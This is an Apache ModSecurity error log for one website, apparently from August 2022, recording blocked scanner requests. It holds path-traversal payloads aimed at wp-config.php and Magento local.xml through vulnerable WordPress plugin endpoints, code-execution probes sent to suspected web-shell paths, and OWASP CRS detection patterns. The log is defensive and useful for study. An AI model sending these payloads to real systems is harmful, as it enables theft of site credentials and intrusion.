[line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/fwduvp/content/downloader.php?path=../../../../wp-config.php&name=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/fwduvp/content/downloader.php"] [unique_id "YwON1k28DpY-LcBEI18HnwAAAFQ"], referer: www.google.com [Mon Aug 22 09:08:26.390421 2022] [:error] [pid 12359:tid 140240580687616] [client 15.235.44.167:50458] [client 15.235.44.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/fwduvp/content/downloader.php?path=../../../../wp-config.php&name=../../../../wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/fwduvp/content/downloader.php"] [unique_id "YwON2lpzUWGiw5HA_e1UJAAAANQ"], referer: www.google.com [Mon Aug 22 13:20:15.636836 2022] [:error] [pid 12359:tid 140240614258432] [client 152.89.196.13:34830] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:xxx. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:xxx: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/install-helper-private.php"] [unique_id "YwPI31pzUWGiw5HA_e1b8AAAANA"] [Mon Aug 22 16:54:12.539610 2022] [:error] [pid 11663:tid 140240706578176] [client 152.89.196.13:41110] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/assets/images/get.php"] [unique_id "YwP7BE28DpY-LcBEI18MVgAAAEU"] [Mon Aug 22 17:16:24.265948 2022] [:error] [pid 11662:tid 140240614258432] [client 152.89.196.13:41884] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:request. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:request: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/quick-setup/css/index.php"] [unique_id "YwQAOKCwxa7XWl7pJbQmTwAAABA"] [Mon Aug 22 20:27:01.200054 2022] [:error] [pid 15950:tid 140240597473024] [client 152.89.196.13:46740] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:shall. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:shall: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordpress-seo/js/index.php"] [unique_id "YwQs5fvBonbN_lKyLg6L9gAAAJI"] [Tue Aug 23 00:51:32.167611 2022] [:error] [pid 15950:tid 140240597473024] [client 152.89.196.13:55900] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:datas. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:datas: print(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/Text/Diff/Engine/tive.php"] [unique_id "YwRq5PvBonbN_lKyLg6P0gAAAJI"] [Tue Aug 23 01:50:05.424396 2022] [:error] [pid 16040:tid 140240723363584] [client 46.137.121.4:57528] [client 46.137.121.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/amfeed/main/download"] [unique_id "YwR4nStFYnMA0YUE_Fr7rgAAAMM"] [Tue Aug 23 01:50:05.711696 2022] [:error] [pid 15950:tid 140240563902208] [client 46.137.121.4:57530] [client 46.137.121.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/magmi-importer/web/download_file.php"] [unique_id "YwR4nfvBonbN_lKyLg6QfwAAAJY"] [Tue Aug 23 01:50:05.907709 2022] [:error] [pid 15950:tid 140240572294912] [client 46.137.121.4:57532] [client 46.137.121.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/magmi/web/download_file.php"] [unique_id "YwR4nfvBonbN_lKyLg6QgAAAAJU"] [Tue Aug 23 01:50:06.091794 2022] [:error] [pid 16040:tid 140240547116800] [client 46.137.121.4:57534] [client 46.137.121.4] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/magmi-importer/conf/magmi.ini"] [unique_id "YwR4nitFYnMA0YUE_Fr7rwAAANg"] [Tue Aug 23 01:50:06.268874 2022] [:error] [pid 15948:tid 140240631043840] [client 46.137.121.4:57536] [client 46.137.121.4] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/magmi/conf/magmi.ini"] [unique_id "YwR4nn5H8abOo6uQn5nQzgAAAA4"] [Tue Aug 23 06:18:34.028520 2022] [:error] [pid 30852:tid 140070308968192] [client 152.89.196.13:37918] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/mu-plugins/.06e0f.php"] [unique_id "YwS3iikJOhN0PFhuKJezAwAAAIM"] [Tue Aug 23 07:27:41.630046 2022] [:error] [pid 32198:tid 140070140991232] [client 46.137.121.4:43644] [client 46.137.121.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/amfeed/main/download"] [unique_id "YwTHvSr5p6PuHbekpr8pRwAAAM8"] [Tue Aug 23 07:27:41.798559 2022] [:error] [pid 30850:tid 140070065456896] [client 46.137.121.4:43646] [client 46.137.121.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/magmi-importer/web/download_file.php"] [unique_id "YwTHvWNh3gkMktV0Ol9DXgAAABg"] [Tue Aug 23 07:27:42.155203 2022] [:error] [pid 30852:tid 140070065456896] [client 46.137.121.4:43648] [client 46.137.121.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/magmi/web/download_file.php"] [unique_id "YwTHvikJOhN0PFhuKJe1ygAAAJg"] [Tue Aug 23 07:27:42.326181 2022] [:error] [pid 30851:tid 140070300575488] [client 46.137.121.4:43652] [client 46.137.121.4] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/magmi-importer/conf/magmi.ini"] [unique_id "YwTHvmc8M_gw9NaLCyGQmAAAAEQ"] [Tue Aug 23 07:27:42.495290 2022] [:error] [pid 30851:tid 140070090635008] [client 46.137.121.4:43654] [client 46.137.121.4] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/magmi/conf/magmi.ini"] [unique_id "YwTHvmc8M_gw9NaLCyGQmQAAAFU"] [Tue Aug 23 11:54:25.057381 2022] [:error] [pid 30850:tid 140070300575488] [client 152.89.196.13:40368] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/assets/images/go.php"] [unique_id "YwUGQWNh3gkMktV0Ol9J9gAAAAQ"] [Tue Aug 23 17:05:10.727735 2022] [:error] [pid 32198:tid 140070182954752] [client 109.162.120.115:53136] [client 109.162.120.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mac-photo-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mac-photo-gallery/macdownload.php"] [unique_id "YwVPFir5p6PuHbekpr9CtgAAAMo"] [Tue Aug 23 17:05:12.951470 2022] [:error] [pid 32198:tid 140070199740160] [client 109.162.120.115:53138] [client 109.162.120.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "YwVPGCr5p6PuHbekpr9CtwAAAMg"] [Tue Aug 23 17:05:13.147632 2022] [:error] [pid 30852:tid 140070140991232] [client 109.162.120.115:53140] [client 109.162.120.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dzs-zoomsounds/savepng.php?location=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dzs-zoomsounds/savepng.php"] [unique_id "YwVPGSkJOhN0PFhuKJfGWQAAAI8"] [Tue Aug 23 17:05:13.317486 2022] [:error] [pid 30852:tid 140070073849600] [client 109.162.120.115:53142] [client 109.162.120.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php"] [unique_id "YwVPGSkJOhN0PFhuKJfGWgAAAJc"] [Tue Aug 23 17:05:13.511431 2022] [:error] [pid 32198:tid 140070216525568] [client 109.162.120.115:53144] [client 109.162.120.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-post.php?alg_wc_pif_download_file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "YwVPGSr5p6PuHbekpr9CuAAAAMY"] [Wed Aug 24 05:45:11.701240 2022] [autoindex:error] [pid 17705:tid 140231873320704] [client 92.205.56.212:57120] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Aug 24 09:47:10.035552 2022] [:error] [pid 17705:tid 140232015996672] [client 